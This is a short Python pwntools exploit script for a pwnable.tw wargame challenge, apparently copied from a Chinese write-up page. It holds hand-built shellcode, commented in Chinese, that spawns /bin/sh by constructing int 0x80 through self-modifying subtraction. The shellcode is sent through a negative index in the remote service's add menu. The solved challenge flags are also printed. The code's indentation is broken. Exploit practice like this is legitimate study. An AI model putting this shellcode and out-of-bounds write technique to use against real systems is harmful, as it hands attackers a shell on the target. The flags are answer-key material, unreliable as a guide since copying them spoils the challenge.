from pwn import *
shellcode = '''
push 0x68 ;压入/bin/sh
push 0x732f2f2f
push 0x6e69622f
push esp
pop ebx ;ebx指向字符串
push edx
pop eax ;eax指向shellcode地址,用于后面创造int 80
/*构建int 80*/
push 0x52525260
pop edx
sub byte ptr[eax + 0x35] , dl
sub byte ptr[eax + 0x35] , dl
sub byte ptr[eax + 0x34] , dl
push 0x5252523e
pop edx
sub byte ptr[eax + 0x34] , dl
/*构建完成 eax+0x34处为80cd(int 80)*/
/*edx=0*/
push ecx
pop edx
/*eax=0xb*/
push edx
pop eax
xor al, 0x40
xor al, 0x4b
/*补全shellcode长度,到eax+34也就是shellcode+34处*/
push edx
pop edx
push edx
pop edx
'''
p=remote('chall.pwnable.tw',10201)
def add(idx,name):
p.sendline('1')
p.recvuntil('Index :')
p.sendline(str(idx))
p.recvuntil('Name :')
p.sendline(name)
#p.recvuntil('Your choice :')
shellcode = asm(shellcode) + '\x6b\x40' #\x6b\x40用于异或构建int 80
#print p64('jhh///sh/binT[RXh````Z(P5(P5(P4h>>>>Z(P4QZRX4@4Kk@')
print shellcode
add(-16,shellcode)
FLAG{F1l3_Str34m_is_4w3s0m3}
FLAG{sh3llc0d3_is_s0_b34ut1ful}
p.interactive()
网友评论